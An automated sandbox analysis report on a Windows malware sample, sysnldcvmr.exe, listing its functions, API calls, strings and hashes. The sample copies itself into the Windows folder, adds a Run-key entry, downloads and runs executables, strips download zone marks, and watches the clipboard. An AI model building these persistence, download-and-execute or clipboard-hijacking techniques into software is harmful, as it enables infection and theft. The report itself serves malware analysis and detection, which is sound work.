                                                                    Function 0040AA80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • htons.WS2_32(00000050), ref: 0040AAAD
                                                                      • Part of subcall function 0040AA40: inet_addr.WS2_32(0040AAC1), ref: 0040AA4A
                                                                      • Part of subcall function 0040AA40: gethostbyname.WS2_32(?), ref: 0040AA5D
                                                                    • socket.WS2_32(00000002,00000001,00000000), ref: 0040AACD
                                                                    • connect.WS2_32(000000FF,?,00000010), ref: 0040AAE6
                                                                    • getsockname.WS2_32(000000FF,?,00000010), ref: 0040AB18
                                                                    Strings
                                                                    • www.update.microsoft.com, xrefs: 0040AAB7
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: connectgethostbynamegetsocknamehtonsinet_addrsocket
                                                                    • String ID: www.update.microsoft.com
                                                                    • API String ID: 4063137541-1705189816
                                                                    • Opcode ID: 17f60f9418bba267ceb1c0f8ef6a4cf2a322d26a33b8be3941e3699853ecfadc
                                                                    • Instruction ID: 53d455f177803832f36bb1991f027e84745f2e467cc2e97abaa02536582c95dc
                                                                    • Opcode Fuzzy Hash: 17f60f9418bba267ceb1c0f8ef6a4cf2a322d26a33b8be3941e3699853ecfadc
                                                                    • Instruction Fuzzy Hash: 09210BB5E103099BCB04DFE8D946AEEBBB5AF4C300F104169E605F7390E7745A45CBAA
                                                                    Function 0040BE80 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26encryptionCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CryptAcquireContextW.ADVAPI32(Bz@,00000000,00000000,00000001,F0000040,?,?,0040BED9,Bz@,00000004,?,?,0040BF0E,000000FF), ref: 0040BE93
                                                                    • CryptGenRandom.ADVAPI32(Bz@,?,00000000,?,?,0040BED9,Bz@,00000004,?,?,0040BF0E,000000FF), ref: 0040BEA9
                                                                    • CryptReleaseContext.ADVAPI32(Bz@,00000000,?,?,0040BED9,Bz@,00000004,?,?,0040BF0E,000000FF), ref: 0040BEB5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Crypt$Context$AcquireRandomRelease
                                                                    • String ID: Bz@
                                                                    • API String ID: 1815803762-793989200
                                                                    • Opcode ID: a24c2434b3afb1955293fcca0a538135b7e24827869c87ceb3569772b55bea96
                                                                    • Instruction ID: 6606508483a264dc8c12e3925f56bba8ecc3e33b87176868a4d93c44792bd7d2
                                                                    • Opcode Fuzzy Hash: a24c2434b3afb1955293fcca0a538135b7e24827869c87ceb3569772b55bea96
                                                                    • Instruction Fuzzy Hash: 87E01275650208BBDB24CFD1EC49FDA776CEB48700F108154F70997280DBB5EA4097A8
                                                                    Function 004013B0 Relevance: 6.1, APIs: 4, Instructions: 63networkthreadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,0040D55D,00000000), ref: 004013D5
                                                                    • socket.WS2_32(00000002,00000002,00000011), ref: 004013E4
                                                                    • bind.WS2_32(?,?,00000010), ref: 00401429
                                                                      • Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401346
                                                                      • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401352
                                                                      • Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 0040135C
                                                                    • CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401459
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindsocket
                                                                    • String ID:
                                                                    • API String ID: 3943618503-0
                                                                    • Opcode ID: 31180d7e4796b58d7a9827198c00b491a772c1cc3db0f11a28eb4642cd00de7f
                                                                    • Instruction ID: f9ba2cfc99a050ce4a8bfcbff2653574801cca82506c6568c29975d90a0f09d7
                                                                    • Opcode Fuzzy Hash: 31180d7e4796b58d7a9827198c00b491a772c1cc3db0f11a28eb4642cd00de7f
                                                                    • Instruction Fuzzy Hash: 61118974A417106FE320DF749C0AF877AE0AF04B54F50892DF699E72E1E3B49544879A
                                                                    Function 00407590 Relevance: 119.4, APIs: 50, Strings: 18, Instructions: 351sleepfilesynchronizationCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • Sleep.KERNEL32(00000BB8), ref: 0040759E
                                                                    • CreateMutexA.KERNEL32(00000000,00000000,753f85d83d), ref: 004075AD
                                                                    • GetLastError.KERNEL32 ref: 004075B9
                                                                    • ExitProcess.KERNEL32 ref: 004075C8
                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\sysnldcvmr.exe,00000105), ref: 00407602
                                                                    • PathFindFileNameW.SHLWAPI(C:\Windows\sysnldcvmr.exe), ref: 0040760D
                                                                    • wsprintfW.USER32 ref: 0040762A
                                                                    • DeleteFileW.KERNEL32(?), ref: 0040763A
                                                                    • ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 00407651
                                                                    • wcscmp.NTDLL ref: 00407663
                                                                    • ExitProcess.KERNEL32 ref: 00407682
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: File$ExitNameProcess$CreateDeleteEnvironmentErrorExpandFindLastModuleMutexPathSleepStringswcscmpwsprintf
                                                                    • String ID: %s:Zone.Identifier$%s\%s$%s\%s$%s\%s$%s\tbtcmds.dat$%s\tbtnds.dat$%temp%$%userprofile%$%windir%$753f85d83d$C:\Users\user\tbtcmds.dat$C:\Users\user\tbtnds.dat$C:\Windows\sysnldcvmr.exe$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Windows Settings$sysnldcvmr.exe
                                                                    • API String ID: 4172876685-36690512
                                                                    • Opcode ID: 482dbe28681a4ff41ac6421b7ae0de9d521586a00b1bdf450ddf1665318c4ecb
                                                                    • Instruction ID: e42dc10877dc27750cdf455f3f1a43eebb5fa16e92bd93e31d1e2fde4cabc692
                                                                    • Opcode Fuzzy Hash: 482dbe28681a4ff41ac6421b7ae0de9d521586a00b1bdf450ddf1665318c4ecb
                                                                    • Instruction Fuzzy Hash: 50D1B6B1A80314BBE720ABA0DC4AFD93734AB48B05F1085B5F709B50D1DAF9A6C4CB5D
                                                                    Function 0040EAE0 Relevance: 73.7, APIs: 34, Strings: 8, Instructions: 227filenetworksleepCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 0040EAE9
                                                                    • srand.MSVCRT ref: 0040EAF0
                                                                    • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0040EB10
                                                                    • strlen.NTDLL ref: 0040EB1A
                                                                    • mbstowcs.NTDLL ref: 0040EB31
                                                                    • rand.MSVCRT ref: 0040EB39
                                                                    • rand.MSVCRT ref: 0040EB4D
                                                                    • wsprintfW.USER32 ref: 0040EB74
                                                                    • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0040EB8A
                                                                    • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040EBB9
                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040EBE8
                                                                    • InternetReadFile.WININET(00000000,?,00000103,?), ref: 0040EC1B
                                                                    • WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 0040EC4C
                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040EC5B
                                                                    • wsprintfW.USER32 ref: 0040EC74
                                                                    • DeleteFileW.KERNEL32(?), ref: 0040EC84
                                                                    • Sleep.KERNEL32(000007D0), ref: 0040ECA5
                                                                    • ExitProcess.KERNEL32 ref: 0040ECCD
                                                                    • DeleteFileW.KERNEL32(?), ref: 0040ECE3
                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040ECF0
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040ECFD
                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040ED0A
                                                                    • Sleep.KERNEL32(000003E8), ref: 0040ED15
                                                                    • rand.MSVCRT ref: 0040ED2A
                                                                    • Sleep.KERNEL32 ref: 0040ED3B
                                                                    • rand.MSVCRT ref: 0040ED41
                                                                    • rand.MSVCRT ref: 0040ED55
                                                                    • wsprintfW.USER32 ref: 0040ED7C
                                                                    • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0040ED99
                                                                    • wsprintfW.USER32 ref: 0040EDB9
                                                                    • DeleteFileW.KERNEL32(?), ref: 0040EDC9
                                                                    • Sleep.KERNEL32(000007D0), ref: 0040EDEA
                                                                    • ExitProcess.KERNEL32 ref: 0040EE11
                                                                    • DeleteFileW.KERNEL32(?), ref: 0040EE20
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: File$Internetrand$CloseDeleteHandleSleepwsprintf$ExitOpenProcess$CountCreateDownloadEnvironmentExpandReadStringsTickWritembstowcssrandstrlen
                                                                    • String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36$]u@$.Mw
                                                                    • API String ID: 3709769524-1426338499
                                                                    • Opcode ID: 9dac2db83c5cbbf107ffe4ab26957e685992ef8480f9046e984eeb60bc069681
                                                                    • Instruction ID: cec73e08c6f056f0168379cb50c3066ff26982e4471096ca0769119a3115f73e
                                                                    • Opcode Fuzzy Hash: 9dac2db83c5cbbf107ffe4ab26957e685992ef8480f9046e984eeb60bc069681
                                                                    • Instruction Fuzzy Hash: 5E81E9B5900318ABE720DB61DC49FEA3379AB88701F0484FDF609A51C1DAB99BD4CF59
                                                                    Function 0040AEA0 Relevance: 34.7, APIs: 13, Strings: 10, Instructions: 198stringCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 92 40aea0-40aeb7 call 40add0 95 40aeb9 92->95 96 40aebe-40aeda call 40aa20 strcmp 92->96 97 40b145-40b148 95->97 100 40aee1-40aefd call 40aa20 strstr 96->100 101 40aedc 96->101 104 40af40-40af5c call 40aa20 strstr 100->104 105 40aeff-40af1b call 40aa20 strstr 100->105 101->97 112 40af5e-40af7a call 40aa20 strstr 104->112 113 40af9f-40afbb call 40aa20 strstr 104->113 110 40af3b 105->110 111 40af1d-40af39 call 40aa20 strstr 105->111 110->97 111->104 111->110 120 40af9a 112->120 121 40af7c-40af98 call 40aa20 strstr 112->121 122 40afbd-40afd9 call 40aa20 strstr 113->122 123 40affe-40b014 EnterCriticalSection 113->123 120->97 121->113 121->120 134 40aff9 122->134 135 40afdb-40aff7 call 40aa20 strstr 122->135 124 40b01f-40b028 123->124 127 40b059-40b064 call 40b150 124->127 128 40b02a-40b03a 124->128 141 40b13a-40b13f LeaveCriticalSection 127->141 142 40b06a-40b078 127->142 131 40b057 128->131 132 40b03c-40b055 call 40d4a0 128->132 131->124 132->127 134->97 135->123 135->134 141->97 144 40b07a 142->144 145 40b07e-40b08f call 409d90 142->145 144->145 145->141 148 40b095-40b0b2 call 40d4a0 145->148 151 40b0b4-40b0c4 148->151 152 40b10a-40b122 148->152 153 40b0d0-40b108 call 40a1b0 151->153 154 40b0c6-40b0ce Sleep 151->154 155 40b128-40b133 call 40b150 152->155 153->155 154->151 155->141 160 40b135 call 40ab80 155->160 160->141
                                                                    APIs
                                                                      • Part of subcall function 0040ADD0: gethostname.WS2_32(?,00000100), ref: 0040ADEC
                                                                      • Part of subcall function 0040ADD0: gethostbyname.WS2_32(?), ref: 0040ADFE
                                                                    • strcmp.NTDLL ref: 0040AED0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: gethostbynamegethostnamestrcmp
                                                                    • String ID: .10$.10.$.127$.127.$.192$.192.$0.0.0.0$10.$127.$192.
                                                                    • API String ID: 2906596889-2213908610
                                                                    • Opcode ID: c5830f0f9c36f6cf05290b869868c0dc91983b72ef23a24c3b2e675c34fe0909
                                                                    • Instruction ID: 458019ee7e4258451e0266341ac37eb9dcc64f8272ac2f4812142232ba39784f
                                                                    • Opcode Fuzzy Hash: c5830f0f9c36f6cf05290b869868c0dc91983b72ef23a24c3b2e675c34fe0909
                                                                    • Instruction Fuzzy Hash: 406162B4A00305BBDF00EF65EC56BAA37659B10348F14847EE8496A3C1E73DE964C79E
                                                                    Function 00405970 Relevance: 25.7, APIs: 17, Instructions: 186clipboardregistryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 162 405970-405992 GetWindowLongW 163 405994-40599b 162->163 164 4059b6-4059bd 162->164 165 4059a1-4059a5 163->165 166 405a27-405a38 IsClipboardFormatAvailable 163->166 167 4059e6-4059ec 164->167 168 4059bf 164->168 171 4059c4-4059e1 SetClipboardViewer SetWindowLongW 165->171 172 4059a7-4059ab 165->172 169 405a43-405a4d IsClipboardFormatAvailable 166->169 170 405a3a-405a41 166->170 174 405a06-405a0a 167->174 175 4059ee-405a04 SetWindowLongW 167->175 173 405ba4-405bbd DefWindowProcA 168->173 179 405a58-405a62 IsClipboardFormatAvailable 169->179 180 405a4f-405a56 169->180 178 405a6b-405a6f 170->178 171->173 181 4059b1 172->181 182 405b5d-405b9e RegisterRawInputDevices ChangeClipboardChain 172->182 176 405a22 174->176 177 405a0c-405a1c SendMessageA 174->177 175->176 176->173 177->176 184 405a75-405a7f OpenClipboard 178->184 185 405b3f-405b43 178->185 179->178 183 405a64 179->183 180->178 181->173 182->173 183->178 184->185 188 405a85-405a96 GetClipboardData 184->188 186 405b45-405b55 SendMessageA 185->186 187 405b5b 185->187 186->187 187->173 189 405a98 188->189 190 405a9d-405aae GlobalLock 188->190 189->173 191 405ab0 190->191 192 405ab5-405ac6 190->192 191->173 193 405ac8-405acc 192->193 194 405ae9-405afc call 405690 192->194 195 405afe-405b0e call 4057b0 193->195 196 405ace-405ad2 193->196 202 405b11-405b25 GlobalUnlock CloseClipboard 194->202 195->202 198 405ad4 196->198 199 405ad6-405ae7 call 405570 196->199 198->202 199->202 202->185 206 405b27-405b3c call 404970 call 40a1b0 202->206 206->185
                                                                    APIs
                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 0040597C
                                                                    • SetClipboardViewer.USER32(?), ref: 004059C8
                                                                    • SetWindowLongW.USER32(?,000000EB,?), ref: 004059DB
                                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 00405A30
                                                                    • OpenClipboard.USER32(00000000), ref: 00405A77
                                                                    • GetClipboardData.USER32(00000000), ref: 00405A89
                                                                    • RegisterRawInputDevices.USER32(?,00000001,0000000C), ref: 00405B90
                                                                    • ChangeClipboardChain.USER32(?,?), ref: 00405B9E
                                                                    • DefWindowProcA.USER32(?,?,?,?), ref: 00405BB4
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Clipboard$Window$Long$AvailableChainChangeDataDevicesFormatInputOpenProcRegisterViewer
                                                                    • String ID:
                                                                    • API String ID: 3549449529-0
                                                                    • Opcode ID: 49ecf4cbec24bbc80f079b1b2f1b6d88094832ae9fccf906fc95d8e2fe17205b
                                                                    • Instruction ID: 2c6a07511b676f4089081adff438ee2b95572153aa6d486a7a165f398962c3b3
                                                                    • Opcode Fuzzy Hash: 49ecf4cbec24bbc80f079b1b2f1b6d88094832ae9fccf906fc95d8e2fe17205b
                                                                    • Instruction Fuzzy Hash: 9A711A74A00608EBDF14DFA4D988BAF77B4EF48301F14852AE505B6290D779AA80CF69
                                                                    Function 00406BC0 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 106sleepthreadCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • Sleep.KERNEL32(000003E8), ref: 00406BCE
                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\sysnldcvmr.exe,00000104), ref: 00406BE0
                                                                      • Part of subcall function 0040E770: CreateFileW.KERNEL32(00406BF0,80000000,00000001,00000000,00000003,00000000,00000000,00406BF0), ref: 0040E790
                                                                      • Part of subcall function 0040E770: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040E7A5
                                                                      • Part of subcall function 0040E770: CloseHandle.KERNEL32(000000FF), ref: 0040E7B2
                                                                    • ExitThread.KERNEL32 ref: 00406D4A
                                                                      • Part of subcall function 004063A0: GetLogicalDrives.KERNEL32 ref: 004063A6
                                                                      • Part of subcall function 004063A0: RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,00000000,00020019,?), ref: 004063F4
                                                                      • Part of subcall function 004063A0: RegQueryValueExW.KERNEL32(?,NoDrives,00000000,00000000,00000000,00000004), ref: 00406421
                                                                      • Part of subcall function 004063A0: RegCloseKey.ADVAPI32(?), ref: 0040643E
                                                                    • Sleep.KERNEL32(00000BB8), ref: 00406D3D
                                                                      • Part of subcall function 004062C0: lstrcpyW.KERNEL32(?,?,?,?,00000019), ref: 00406313
                                                                    • GetVolumeInformationW.KERNEL32(?,?,00000105,00000000,00000000,?,00000000,00000000), ref: 00406C7F
                                                                    • GetDiskFreeSpaceExW.KERNEL32(?,00000000,?,00000000), ref: 00406C94
                                                                    • _aulldiv.NTDLL(?,?,40000000,00000000), ref: 00406CAF
                                                                    • wsprintfW.USER32 ref: 00406CC2
                                                                    • wsprintfW.USER32 ref: 00406CE2
                                                                    • wsprintfW.USER32 ref: 00406D05
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Filewsprintf$CloseSleep$CreateDiskDrivesExitFreeHandleInformationLogicalModuleNameOpenQuerySizeSpaceThreadValueVolume_aulldivlstrcpy
                                                                    • String ID: (%dGB)$%s%s$C:\Windows\sysnldcvmr.exe$Unnamed volume
                                                                    • API String ID: 1650488544-3455140397
                                                                    • Opcode ID: 3ff50a499cc3cb1ca5597e24ae18a8291f76a1d6cde0f573ca4de3ef4abdd767
                                                                    • Instruction ID: f0476b63a1379e6dca01d87e2afc3553bbde202c422fcd3a3a6a752a7ad43008
                                                                    • Opcode Fuzzy Hash: 3ff50a499cc3cb1ca5597e24ae18a8291f76a1d6cde0f573ca4de3ef4abdd767
                                                                    • Instruction Fuzzy Hash: 53418471900318ABEB14DB94DD45FEE7778BB44700F1045A9F20AA51D0DB785B94CF6A
                                                                    Function 00405880 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 73windowsleepregistryCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • memset.NTDLL ref: 00405898
                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004058B0
                                                                    • Sleep.KERNEL32(00000001), ref: 004058C4
                                                                    • GetTickCount.KERNEL32 ref: 004058CA
                                                                    • GetTickCount.KERNEL32 ref: 004058D3
                                                                    • wsprintfW.USER32 ref: 004058E6
                                                                    • RegisterClassExW.USER32(00000030), ref: 004058F3
                                                                    • CreateWindowExW.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,?,00000000), ref: 0040591C
                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00405937
                                                                    • TranslateMessage.USER32(?), ref: 00405945
                                                                    • DispatchMessageA.USER32(?), ref: 0040594F
                                                                    • ExitThread.KERNEL32 ref: 00405961
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: Message$CountTick$ClassCreateDispatchExitHandleModuleRegisterSleepThreadTranslateWindowmemsetwsprintf
                                                                    • String ID: %x%X$0
                                                                    • API String ID: 716646876-225668902
                                                                    • Opcode ID: 782a45269e3dbcd5f001198ba08731f5a4c25339978a850d22dce32c5997214b
                                                                    • Instruction ID: 85e967beda8c0998690da8d5d0b59a8f0be79fc45de23a81cc248e6733ffc6a2
                                                                    • Opcode Fuzzy Hash: 782a45269e3dbcd5f001198ba08731f5a4c25339978a850d22dce32c5997214b
                                                                    • Instruction Fuzzy Hash: DB211DB1940308BBEB10ABA0DC49FEE7B78EB04711F10812AF601BA1D0DBB99545CF68
                                                                    Function 0040E7C0 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 144fileCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 241 40e7c0-40e7ff CreateFileW 242 40e805-40e820 CreateFileMappingW 241->242 243 40e91a-40e91e 241->243 244 40e910-40e913 242->244 245 40e826-40e83f MapViewOfFile 242->245 246 40e920-40e940 CreateFileW 243->246 247 40e974-40e97a 243->247 244->243 248 40e845-40e85b GetFileSize 245->248 249 40e906-40e909 245->249 250 40e942-40e961 WriteFile 246->250 251 40e968-40e96c call 40a1b0 246->251 253 40e861-40e874 call 40c7f0 248->253 254 40e8fc-40e900 UnmapViewOfFile 248->254 249->244 250->251 255 40e971 251->255 253->254 258 40e87a-40e889 253->258 254->249 255->247 258->254 259 40e88b-40e8ab call 40c190 258->259 261 40e8b0-40e8ba 259->261 261->254 262 40e8bc-40e8e7 call 40a4e0 memcmp 261->262 262->254 265 40e8e9-40e8f5 call 40a1b0 262->265 265->254
                                                                    APIs
                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040E7F2
                                                                    • CreateFileMappingW.KERNELBASE(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040E813
                                                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040E832
                                                                    • GetFileSize.KERNEL32(000000FF,00000000), ref: 0040E84B
                                                                    • memcmp.NTDLL ref: 0040E8DD
                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E900
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040E90A
                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040E914
                                                                    • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040E933
                                                                    • WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 0040E958
                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040E962
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1688093138.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1688076212.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688112526.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688131848.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1688148794.0000000000415000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
